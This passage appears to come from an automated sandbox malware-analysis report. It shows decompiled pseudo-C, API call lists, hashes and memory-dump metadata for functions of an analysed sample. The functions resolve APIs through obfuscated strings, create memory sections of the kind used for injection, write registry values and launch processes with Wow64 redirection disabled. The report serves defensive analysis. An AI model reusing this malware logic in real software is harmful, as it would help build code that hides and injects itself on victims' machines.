                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 033F4AA3
                                                                                  • SysFreeString.OLEAUT32(?), ref: 033F4AB1
                                                                                    • Part of subcall function 033F13AD: Sleep.KERNELBASE(000001F4), ref: 033F13F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                  • String ID:
                                                                                  • API String ID: 2118684380-0
                                                                                  • Opcode ID: 6876993aa914fe624bb9b03df57be59a804dfb6466049c00dbbf0f2a8e5381a3
                                                                                  • Instruction ID: 382233400c3893bb952940f00bc4bfbd17e81a41a01f30a20ebfbacce0eb8867
                                                                                  • Opcode Fuzzy Hash: 6876993aa914fe624bb9b03df57be59a804dfb6466049c00dbbf0f2a8e5381a3
                                                                                  • Instruction Fuzzy Hash: 0E510E7690020AEFDF00DFA5C8C48AEB7BAFF88300B558969E615EB224D735DD45CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F83EC, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 033F4AC1: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,05F289D0,033F841C,?,?,?,?,?,?,?,?,?,?,?,033F841C), ref: 033F4B8D
                                                                                    • Part of subcall function 033F7004: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 033F7041
                                                                                    • Part of subcall function 033F7004: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 033F7072
                                                                                  • SysAllocString.OLEAUT32(?), ref: 033F8448
                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 033F845C
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 033F846E
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84D2
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84E1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 033F84EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                                                  • String ID:
                                                                                  • API String ID: 2831207796-0
                                                                                  • Opcode ID: 27318bff127fb2f650ddcc64d6d64155364bf792a71e44a77d22e6ed58b99169
                                                                                  • Instruction ID: 3ab2ec7238cf52466a7bf644da8cf466b558cb1f7423fff01f5affca1bde1ed7
                                                                                  • Opcode Fuzzy Hash: 27318bff127fb2f650ddcc64d6d64155364bf792a71e44a77d22e6ed58b99169
                                                                                  • Instruction Fuzzy Hash: 0B315232D00A09AFDB01EFB8C88899FB7BAEF49310F554465EE10EB110DB75D946CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F40AF, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F40AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E033F75C4(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x33fd230; // 0x2b2a5a8
					_t1 = _t23 + 0x33fe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x33fd230; // 0x2b2a5a8
					_t2 = _t26 + 0x33fe787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E033F4C31(_t54);
					} else {
						_t30 =  *0x33fd230; // 0x2b2a5a8
						_t5 = _t30 + 0x33fe774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x33fd230; // 0x2b2a5a8
							_t7 = _t33 + 0x33fe797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x33fd230; // 0x2b2a5a8
								_t9 = _t36 + 0x33fe756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x33fd230; // 0x2b2a5a8
									_t11 = _t39 + 0x33fe7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E033F4F73(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                  0x033f40be
                                                                                  0x033f40c2
                                                                                  0x033f4184
                                                                                  0x033f40c8
                                                                                  0x033f40c8
                                                                                  0x033f40cd
                                                                                  0x033f40e0
                                                                                  0x033f40e2
                                                                                  0x033f40e7
                                                                                  0x033f40ef
                                                                                  0x033f40f6
                                                                                  0x033f40fa
                                                                                  0x033f40fd
                                                                                  0x033f417c
                                                                                  0x033f417d
                                                                                  0x033f40ff
                                                                                  0x033f40ff
                                                                                  0x033f4104
                                                                                  0x033f410c
                                                                                  0x033f4110
                                                                                  0x033f4113
                                                                                  0x00000000
                                                                                  0x033f4115
                                                                                  0x033f4115
                                                                                  0x033f411a
                                                                                  0x033f4122
                                                                                  0x033f4126
                                                                                  0x033f4129
                                                                                  0x00000000
                                                                                  0x033f412b
                                                                                  0x033f412b
                                                                                  0x033f4130
                                                                                  0x033f4138
                                                                                  0x033f413c
                                                                                  0x033f413f
                                                                                  0x00000000
                                                                                  0x033f4141
                                                                                  0x033f4141
                                                                                  0x033f4146
                                                                                  0x033f414e
                                                                                  0x033f4152
                                                                                  0x033f4155
                                                                                  0x00000000
                                                                                  0x033f4157
                                                                                  0x033f415d
                                                                                  0x033f4162
                                                                                  0x033f4169
                                                                                  0x033f4170
                                                                                  0x033f4173
                                                                                  0x00000000
                                                                                  0x033f4175
                                                                                  0x033f4178
                                                                                  0x033f4178
                                                                                  0x033f4173
                                                                                  0x033f4155
                                                                                  0x033f413f
                                                                                  0x033f4129
                                                                                  0x033f4113
                                                                                  0x033f40fd
                                                                                  0x033f4192

                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,033F7E5B,?,?,?,?,00000000,00000000), ref: 033F40D4
                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 033F40F6
                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 033F410C
                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 033F4122
                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 033F4138
                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 033F414E
                                                                                    • Part of subcall function 033F4F73: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,033F416E), ref: 033F4FD0
                                                                                    • Part of subcall function 033F4F73: memset.NTDLL ref: 033F4FF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3012371009-0
                                                                                  • Opcode ID: abc068529e6d373c44c6f475e41414c55d987184a1220fbd3e428a9404e99c74
                                                                                  • Instruction ID: 513986b830b651d635d0c5ffdbed616fa8f712c1b1c52ff73f971e39d2e25746
                                                                                  • Opcode Fuzzy Hash: abc068529e6d373c44c6f475e41414c55d987184a1220fbd3e428a9404e99c74
                                                                                  • Instruction Fuzzy Hash: 07214FB150030AAFD750EFAACDC8E5B77ECEB08740B844625FA05C7654E734E9058BB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F1650, Relevance: 9.1, APIs: 6, Instructions: 75memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 79%
                                                                                  			E033F1650(void* __eax, void* _a4, char* _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				char* _t49;
				char* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 =  &(_t49[_t5]);
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 = StrStrA(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t33 = RtlAllocateHeap( *0x33fd1f0, 0, _a16 + _t55); // executed
						_t44 = _t33;
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

















                                                                                  0x033f1658
                                                                                  0x033f165d
                                                                                  0x033f165f
                                                                                  0x033f1666
                                                                                  0x033f1678
                                                                                  0x033f1678
                                                                                  0x033f167c
                                                                                  0x033f167e
                                                                                  0x033f1681
                                                                                  0x033f1684
                                                                                  0x033f168d
                                                                                  0x033f1697
                                                                                  0x033f169b
                                                                                  0x033f16a0
                                                                                  0x033f16b0
                                                                                  0x033f16b6
                                                                                  0x033f16ba
                                                                                  0x033f170b
                                                                                  0x033f16bc
                                                                                  0x033f16bc
                                                                                  0x033f16c4
                                                                                  0x033f16d3
                                                                                  0x033f16d8
                                                                                  0x033f16e8
                                                                                  0x033f16ee
                                                                                  0x033f16f9
                                                                                  0x033f1703
                                                                                  0x033f1707
                                                                                  0x033f1707
                                                                                  0x033f16ba
                                                                                  0x033f1712
                                                                                  0x033f1719

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 033F1684
                                                                                  • StrStrA.SHLWAPI(00000000,?), ref: 033F1691
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 033F16B0
                                                                                  • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 033F16C4
                                                                                  • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16D3
                                                                                  • memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 033F16EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1819133394-0
                                                                                  • Opcode ID: 77aa42a2bd0bdcee319b3a973095c5518302bf2be08cc49cf6cc01dec6051d88
                                                                                  • Instruction ID: a2d1150dce0f10a3cd65594321e6ed26c95d6977b82f1490d75ea4e90dcc6f0d
                                                                                  • Opcode Fuzzy Hash: 77aa42a2bd0bdcee319b3a973095c5518302bf2be08cc49cf6cc01dec6051d88
                                                                                  • Instruction Fuzzy Hash: 02218E36900209AFDF119F68DC88A9EBFB9EF85300F484154F904AB305C734EA19CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033FA360, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 88%
                                                                                  			E033FA360(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr _t65;
				char _t68;
				void* _t71;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x33fd2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E033F745D(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					_t63 = E033F8557(_t97, _t105, _t96, _t60); // executed
					if(_t63 != 0) {
						L27:
						E033F4C31(_a8);
						goto L29;
					}
					_t65 =  *0x33fd230; // 0x2b2a5a8
					_t16 = _t65 + 0x33fe908; // 0x65696c43
					_t68 = E033F745D(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d033fc0, executed
						_t71 = E033F7325( *_t33, _t96, _a8,  *0x33fd2e4,  *((intOrPtr*)( *_t29 + 0x28))); // executed
						if(_t71 == 0) {
							_t72 =  *0x33fd230; // 0x2b2a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x33fea0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x33fe927; // 0x55434b48
								_t73 = _t34;
							}
							if(E033F7D0C( &_a24, _t73,  *0x33fd2e4,  *0x33fd2e8,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x33fd230; // 0x2b2a5a8
									_t44 = _t75 + 0x33fe893; // 0x74666f53
									_t78 = E033F745D(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d033fc0
										E033F3FF3( *_t47, _t96, _a8,  *0x33fd2e8, _a24);
										_t49 = _t105 + 0x10; // 0x3d033fc0
										E033F3FF3( *_t49, _t96, _t103,  *0x33fd2e0, _a16);
										E033F4C31(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d033fc0
									E033F3FF3( *_t40, _t96, _a8,  *0x33fd2e8, _a24);
									_t43 = _t105 + 0x10; // 0x3d033fc0
									E033F3FF3( *_t43, _t96, _a8,  *0x33fd2e0, _a16);
								}
								if( *_t105 != 0) {
									E033F4C31(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d033fc0
					if(E033F51C4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d033fc0
							E033F7325( *_t26, _t96, _a8, _a24, _t104);
						}
						E033F4C31(_t104);
						_t102 = _a16;
					}
					E033F4C31(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x33fd2ec);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

























                                                                                  0x033fa360
                                                                                  0x033fa369
                                                                                  0x033fa370
                                                                                  0x033fa375
                                                                                  0x033fa3e4
                                                                                  0x033fa3ea
                                                                                  0x033fa3ef
                                                                                  0x033fa3f8
                                                                                  0x033fa3ff
                                                                                  0x033fa402
                                                                                  0x033fa576
                                                                                  0x033fa57d
                                                                                  0x033fa57d
                                                                                  0x033fa582
                                                                                  0x033fa584
                                                                                  0x033fa584
                                                                                  0x033fa58d
                                                                                  0x033fa58d
                                                                                  0x033fa408
                                                                                  0x033fa40d
                                                                                  0x033fa414
                                                                                  0x033fa56c
                                                                                  0x033fa56f
                                                                                  0x00000000
                                                                                  0x033fa56f
                                                                                  0x033fa41a
                                                                                  0x033fa41f
                                                                                  0x033fa428
                                                                                  0x033fa42f
                                                                                  0x033fa432
                                                                                  0x033fa47c
                                                                                  0x033fa47c
                                                                                  0x033fa48f
                                                                                  0x033fa492
                                                                                  0x033fa499
                                                                                  0x033fa4a1
                                                                                  0x033fa4a6
                                                                                  0x033fa4b0
                                                                                  0x033fa4b0
                                                                                  0x033fa4a8
                                                                                  0x033fa4a8
                                                                                  0x033fa4a8
                                                                                  0x033fa4a8
                                                                                  0x033fa4d2
                                                                                  0x033fa4da
                                                                                  0x033fa508
                                                                                  0x033fa50d
                                                                                  0x033fa516
                                                                                  0x033fa51b
                                                                                  0x033fa51f
                                                                                  0x033fa551
                                                                                  0x033fa521
                                                                                  0x033fa52e
                                                                                  0x033fa531
                                                                                  0x033fa541
                                                                                  0x033fa544
                                                                                  0x033fa54a
                                                                                  0x033fa54a
                                                                                  0x033fa4dc
                                                                                  0x033fa4e9
                                                                                  0x033fa4ec
                                                                                  0x033fa4fe
                                                                                  0x033fa501
                                                                                  0x033fa501
                                                                                  0x033fa55b
                                                                                  0x033fa567
                                                                                  0x033fa55d
                                                                                  0x033fa560
                                                                                  0x033fa560
                                                                                  0x033fa55b
                                                                                  0x033fa4d2
                                                                                  0x00000000
                                                                                  0x033fa499
                                                                                  0x033fa441
                                                                                  0x033fa44b
                                                                                  0x033fa44d
                                                                                  0x033fa452
                                                                                  0x033fa456
                                                                                  0x033fa458
                                                                                  0x033fa463
                                                                                  0x033fa466
                                                                                  0x033fa466
                                                                                  0x033fa46c
                                                                                  0x033fa471
                                                                                  0x033fa471
                                                                                  0x033fa477
                                                                                  0x00000000
                                                                                  0x033fa477
                                                                                  0x033fa37a
                                                                                  0x00000000
                                                                                  0x033fa3a1
                                                                                  0x033fa3ac
                                                                                  0x033fa3c2
                                                                                  0x033fa3c8
                                                                                  0x033fa3d0
                                                                                  0x00000000
                                                                                  0x033fa3d0

                                                                                  APIs
                                                                                  • StrChrA.SHLWAPI(033F544E,0000005F,00000000,00000000,00000104), ref: 033FA393
                                                                                  • memcpy.NTDLL(?,033F544E,?), ref: 033FA3AC
                                                                                  • lstrcpy.KERNEL32(?), ref: 033FA3C2
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                    • Part of subcall function 033F3FF3: lstrlenW.KERNEL32(033F544E,?,?,033FA536,3D033FC0,80000002,033F544E,033F5886,74666F53,4D4C4B48,033F5886,?,3D033FC0,80000002,033F544E,?), ref: 033F4013
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 033FA3E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                  • String ID: \
                                                                                  • API String ID: 2598994505-2967466578
                                                                                  • Opcode ID: 131e8dfd148072f641e2aefd4b5c411f5ccd29e0aefa5814665fb24fb8fad11a
                                                                                  • Instruction ID: 2782e6535739759e7e107fb1fdbf49a1b546d76c6384d6aa72de4d4cc276372f
                                                                                  • Opcode Fuzzy Hash: 131e8dfd148072f641e2aefd4b5c411f5ccd29e0aefa5814665fb24fb8fad11a
                                                                                  • Instruction Fuzzy Hash: 2351597690020ABFCF11EFA0DCC4EAA7BBDEB08350F804525FA599A164D735DA15EF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F3267, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 32%
                                                                                  			E033F3267(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E033F83EC(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x33fd230; // 0x2b2a5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x33fe4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x33fe92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x33fd0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                                                                  0x033f3267
                                                                                  0x033f326e
                                                                                  0x033f3272
                                                                                  0x033f3277
                                                                                  0x033f327e
                                                                                  0x033f3281
                                                                                  0x033f328b
                                                                                  0x033f3290
                                                                                  0x033f329c
                                                                                  0x033f32a3
                                                                                  0x033f32ad
                                                                                  0x033f32ad
                                                                                  0x033f32a5
                                                                                  0x033f32a5
                                                                                  0x033f32a5
                                                                                  0x033f32a5
                                                                                  0x033f32b3
                                                                                  0x033f32b6
                                                                                  0x033f32be
                                                                                  0x033f32c1
                                                                                  0x033f32c4
                                                                                  0x033f32c7
                                                                                  0x033f32cc
                                                                                  0x033f32d5
                                                                                  0x033f32e2
                                                                                  0x033f32d7
                                                                                  0x033f32dd
                                                                                  0x033f32dd
                                                                                  0x033f32e8
                                                                                  0x033f32e8
                                                                                  0x033f32f0

                                                                                  APIs
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(?), ref: 033F8448
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(0070006F), ref: 033F845C
                                                                                    • Part of subcall function 033F83EC: SysAllocString.OLEAUT32(00000000), ref: 033F846E
                                                                                    • Part of subcall function 033F83EC: SysFreeString.OLEAUT32(00000000), ref: 033F84D2
                                                                                  • memset.NTDLL ref: 033F328B
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 033F32C7
                                                                                  • GetLastError.KERNEL32 ref: 033F32D7
                                                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 033F32E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                                                  • String ID: <
                                                                                  • API String ID: 593937197-4251816714
                                                                                  • Opcode ID: f2f68c8c5c36532dc641c971982622a503923f99527b472dafbe9c58794d9877
                                                                                  • Instruction ID: 5f6285c648342155dd1c2b8dddb2a43619c70db8c9bff925a4ec50853cd829fd
                                                                                  • Opcode Fuzzy Hash: f2f68c8c5c36532dc641c971982622a503923f99527b472dafbe9c58794d9877
                                                                                  • Instruction Fuzzy Hash: 8511FA75900218BFDB10EFA5D8C9BD97BBCFB08390F848016EA05EA244D778D5458BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F4838, Relevance: 7.6, APIs: 5, Instructions: 92synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F4838(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x33fd228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x33fd230; // 0x2b2a5a8
				_t3 = _t8 + 0x33fe84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E033F4200(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x33fd234, 1, 0, _t30);
					E033F4C31(_t30);
				}
				_t12 =  *0x33fd214; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E033F31DD(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E033F3267(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t14 = E033F7E3F(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}


















                                                                                  0x033f4839
                                                                                  0x033f4840
                                                                                  0x033f484a
                                                                                  0x033f484e
                                                                                  0x033f4854
                                                                                  0x033f4861
                                                                                  0x033f4868
                                                                                  0x033f486c
                                                                                  0x033f487e
                                                                                  0x033f4880
                                                                                  0x033f4880
                                                                                  0x033f4885
                                                                                  0x033f488c
                                                                                  0x033f4897
